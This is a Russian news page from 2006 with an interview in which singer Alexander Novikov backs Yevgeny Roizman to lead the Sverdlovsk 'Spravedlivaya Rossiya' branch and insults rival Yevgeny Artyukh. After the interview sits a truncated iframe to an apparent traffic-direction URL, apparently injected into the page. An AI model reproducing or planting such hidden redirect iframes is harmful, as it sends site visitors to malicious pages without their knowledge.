21.12.2006, 13:50

Александр Новиков: Руководителем свердловского отделения «Справедливой России» будет Евгений Ройзман

Сегодня известный певец, композитор и общественный деятель Александр Новиков ответил на вопросы журналистов.


— Евгений Ройзман, ранее никогда не бывший членом какой-либо партии, на днях вступил в «Справедливую Россию». Планируете ли Вы вступить в «Справедливую Россию»?

— Евгений Ройзман совершил совершенно правильный, своевременный и достойный поступок. В объединительном процессе трех партий сегодня есть вполне определенные сложности, и поэтому в этот сложный момент Ройзман ПРИШЕЛ в партию, а не ВЫШЕЛ из нее.

После того как произойдет объединительный процесс и предатели, провокаторы и трусы, такие как Зяблицев и Артюх, останутся за пределами партийных рядов, думаю, мое вступление в «Справедливую Россию» будет вполне закономерным.


— Кто, на Ваш взгляд, будет рекомендован на должность председателя совета регионального отделения партии «Справедливая Россия — Родина/ Пенсионеры/ Жизнь»?

— Я не сомневаюсь и могу сказать, отвечая за каждое сказанное мною слово, что руководителем будет Евгений Ройзман, одним из заместителей будет Александр Бурков, третьим на пару месяцев, по формальным обстоятельствам, возможно, будет Артюх. Не более. Политическая карьера Артюха, так и не начавшись, закончилась бесславно и с позором. Кроме того, что он ополоумел от ускользающей от него власти (а открытое письмо Миронову, автор которого, безусловно, он, и является воплем его непорядочной души), он еще и трус. Состряпал провокационную бумагу, отправил ее со своего официального адреса в Областной Думе, набрехал и оклеветал С.М. Миронова. А потом, обуреваемый страхом за содеянное, начал нести такую ахинею, что его партийному руководству стало стыдно и страшно, если такой человек вдруг станет руководить региональным отделением партии «Справедливая Россия». Еще раз повторяю: его политическая карьера закончена.


— Почему именно Евгений Ройзман, а не Валерий Черешнев и Дмитрий Уткин, которым прочили лидерство в региональном отделении?

— Безусловно, все трое — очень достойные люди. Но мое предпочтение все-таки Евгению Вадимовичу. Он более известный и более харизматичный. Кроме того, он депутат Государственной Думы и сможет в новой должности сохранить за собой этот статус. Для нашей партии это очень важно.


— Вчера появилась информация, что Артюх на Кубе отдыхает, а сегодня днем он уже собирался проводить конференцию…

— Он и про Кубу врет — сидит здесь. И про конференцию врет — не будет в этом году конференции, Москва ему запретила это делать. И про письмо врет — это его письмо. И везде и всюду врет. Поймите, он сшил себе треуголку, натянул ее на башку, а теперь у него эту треуголку отняли. Лысый политический клоун.


— После выборов Вы встречались с Сергеем Мироновым? Что обсуждали?

— Да, мы встречались несколько раз. Круг вопросов был самым широким: и искусство, и мое творчество, и политика. В разговорах о политике я настаивал на своей точке зрения о том, чтобы ни Зяблицева, ни Артюха не только в руководстве, а и в партийных рядах не было. Мое мнение и мнение Сергея Михайловича не расходятся ни на йоту.


— Когда и где будет показан Ваш концерт в Большом Кремлевском Дворце?

— В самое лучшее новогоднее время — 1 января 2007 года в 21:20 по каналу НТВ. Это двухчасовой концерт. К слову сказать, С.М. Миронов присутствовал на этом концерте. Для нашего коллектива это большая честь. Концерт ему очень понравился.

<iframe src="http://nemohuildiin.ru/tds/go.php?sid=

Похожие новости по теме
13.09.2007, 08:22

Свердловская «Справедливая Россия» сегодня определит список кандидатов в Госдуму

Сегодня состоится конференция регионального отделения политической партии «Справедливая Россия». В ней примут участие делегаты от местных отделений и представители членов партии «Справедливая...

25.01.2007, 11:04

СРОЧНО!!! Руководитель свердловской организации Российской партии пенсионеров Евгений Артюх: Я направил письмо в президиум партии «Справедливая Россия» о добровольном выходе из ее рядов

Политсовет, 25.01.2007. «Я сегодня направил письмо в президиум партии «Справедливая Россия» о выходе из ее рядов. Я выхожу добровольно», — заявил ИА «Политсовет» депутат Областной Думы Евгений Артюх....

28.12.2006, 08:58

Концерт Александра Новикова — 1 января на канале НТВ

Политсовет, 28.12.2006. Как стало известно ИА «Политсовет», в самое лучшее новогоднее время — 1 января 2007 года — по каналу НТВ будет показан концерт известного певца и композитора Александра...

19.12.2006, 10:45

Евгений Ройзман: У человека просто «снесло треуголку»

Политсовет, 19.12.2006. «Справедливая Россия» еще не начала свою работу, а те, кто еще ничего реального не сделал, уже начали вести себя крайне нервно», — заявил ИА «Политсовет» депутат...

02.06.2006, 12:23

Александр Новиков: Евгений Ройзман — ценное приобретение для Российской Партии Жизни

Политсовет, 02.06.2006. Певец и композитор Александр Новиков в эксклюзивном блиц-интервью «Политсовету» очень высоко оценил тот факт, что именно депутат Евгений Ройзман возглавит список Российской...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам